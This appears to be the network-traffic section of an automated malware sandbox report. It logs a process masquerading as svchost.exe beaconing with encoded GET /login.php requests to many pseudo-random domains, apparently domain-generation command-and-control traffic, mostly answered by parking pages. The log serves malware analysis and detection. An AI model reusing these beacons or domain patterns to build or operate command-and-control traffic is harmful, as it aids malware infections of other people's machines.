Aug 23, 2024 18:47:38.392822027 CEST	338	IN	HTTP/1.1 302 Found date: Fri, 23 Aug 2024 16:47:38 GMT server: Apache set-cookie: __tad=1724431658.5743798; expires=Mon, 21-Aug-2034 16:47:38 GMT; Max-Age=315360000 location: http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	51129	103.224.212.210	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:38.030421972 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:38.714612961 CEST	340	IN	HTTP/1.1 302 Found date: Fri, 23 Aug 2024 16:47:38 GMT server: Apache set-cookie: __tad=1724431658.5024510; expires=Mon, 21-Aug-2034 16:47:38 GMT; Max-Age=315360000 location: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	51130	154.85.183.50	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:38.168504953 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:39.076988935 CEST	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:47:38 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Aug 23, 2024 18:47:39.078131914 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:39.439879894 CEST	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:47:39 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	51131	64.190.63.136	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:38.754611969 CEST	354	OUT	GET /login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:39.540278912 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:47:39 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vKxkoCTru8h+iIi5Tt3O5+PIpHGgmbGBtIa4qyOAFr7SWe06f17cSlq4oBZ8NMznfEtxup49PolcyFrAAupYNA== last-modified: Fri, 23 Aug 2024 16:47:39 GMT x-cache-miss-from: parking-89b87dbbb-688bm server: Parking/1.0 Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 76 4b 78 6b 6f 43 54 72 75 38 68 2b 69 49 69 35 54 74 33 4f 35 2b 50 49 70 48 47 67 6d 62 47 42 74 49 61 34 71 79 4f 41 46 72 37 53 57 65 30 36 66 31 37 63 53 6c 71 34 6f 42 5a 38 4e 4d 7a 6e 66 45 74 78 75 70 34 39 50 6f 6c 63 79 46 72 41 41 75 70 59 4e 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vKxkoCTru8h+iIi5Tt3O5+PIpHGgmbGBtIa4qyOAFr7SWe06f17cSlq4oBZ8NMznfEtxup49PolcyFrAAupYNA==><head><meta charset="utf-8"><title>vofycot.com - This website is for sale! - vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and best
Aug 23, 2024 18:47:39.540492058 CEST	1236	IN	Data Raw: 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f Data Ascii: source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com h1062as it all. We hope you find what you are searching for!"><link rel="icon" type="im
Aug 23, 2024 18:47:39.540507078 CEST	1236	IN	Data Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
Aug 23, 2024 18:47:39.541769028 CEST	1236	IN	Data Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
Aug 23, 2024 18:47:39.541780949 CEST	1236	IN	Data Raw: 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 Data Ascii: -size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__conte
Aug 23, 2024 18:47:39.544677019 CEST	1236	IN	Data Raw: 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e Data Ascii: gin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition
Aug 23, 2024 18:47:39.544689894 CEST	1236	IN	Data Raw: 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d Data Ascii: d-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-s
Aug 23, 2024 18:47:39.546359062 CEST	1236	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 Data Ascii: ransform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:
Aug 23, 2024 18:47:39.546371937 CEST	1236	IN	Data Raw: 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 Data Ascii: -moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-hei
Aug 23, 2024 18:47:39.553246021 CEST	1236	IN	Data Raw: 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 0d 0a 37 33 46 0d 0a 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a Data Ascii: e}.webarchive-block{text-align:center}.webarchive-block__73Fheader-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-lin
Aug 23, 2024 18:47:39.565778971 CEST	1236	IN	Data Raw: 34 6f 42 5a 38 4e 4d 7a 6e 66 45 74 78 75 70 34 39 50 6f 6c 63 79 46 72 41 41 75 70 59 4e 41 3d 3d 22 2c 22 74 69 64 22 3a 22 33 30 39 37 22 2c 22 62 75 79 62 6f 78 22 3a 74 72 75 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 Data Ascii: 4oBZ8NMznfEtxup49PolcyFrAAupYNA==","tid":"3097","buybox":true,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"https://sedo.com/search/details/?partnerid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	51132	199.59.243.226	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:39.257045031 CEST	356	OUT	GET /login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:39.845093966 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:47:39 GMT content-type: text/html; charset=utf-8 content-length: 1226 x-request-id: 04d6d613-44be-4152-949e-6ee5c5794559 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PZkF1bIkSBdTmq46NXSrZTjzChbIOJSzaQyqLTfJtzGyDMShbBnwDW61YfcO5ZXL/74o7aEERfsFmEpl7xDh1A== set-cookie: parking_session=04d6d613-44be-4152-949e-6ee5c5794559; expires=Fri, 23 Aug 2024 17:02:39 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 5a 6b 46 31 62 49 6b 53 42 64 54 6d 71 34 36 4e 58 53 72 5a 54 6a 7a 43 68 62 49 4f 4a 53 7a 61 51 79 71 4c 54 66 4a 74 7a 47 79 44 4d 53 68 62 42 6e 77 44 57 36 31 59 66 63 4f 35 5a 58 4c 2f 37 34 6f 37 61 45 45 52 66 73 46 6d 45 70 6c 37 78 44 68 31 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PZkF1bIkSBdTmq46NXSrZTjzChbIOJSzaQyqLTfJtzGyDMShbBnwDW61YfcO5ZXL/74o7aEERfsFmEpl7xDh1A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Aug 23, 2024 18:47:39.847008944 CEST	867	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDRkNmQ2MTMtNDRiZS00MTUyLTk0OWUtNmVlNWM1Nzk0NTU5IiwicGFnZV90aW1lIjoxNzI0NDMxNjU5LCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50749	64.225.91.73	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:40.773272038 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:41.392220974 CEST	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Fri, 23 Aug 2024 16:47:41 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50750	72.52.179.174	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:41.009427071 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50751	72.52.179.174	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:41.617479086 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	63803	52.34.198.229	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:46.496144056 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:47.291793108 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=230ba644e827e5eb69b76dd744835699\|8.46.123.33\|1724431667\|1724431667\|0\|1\|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	63308	44.221.84.105	80

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:49.437999964 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:49.946039915 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=61afe5b7d011093f87c495eec767f391\|8.46.123.33\|1724431669\|1724431669\|0\|1\|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	64271	172.234.222.143	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:51.415267944 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	64272	44.221.84.105	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:51.415682077 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:51.929857969 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	64273	162.255.119.102	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:51.431920052 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
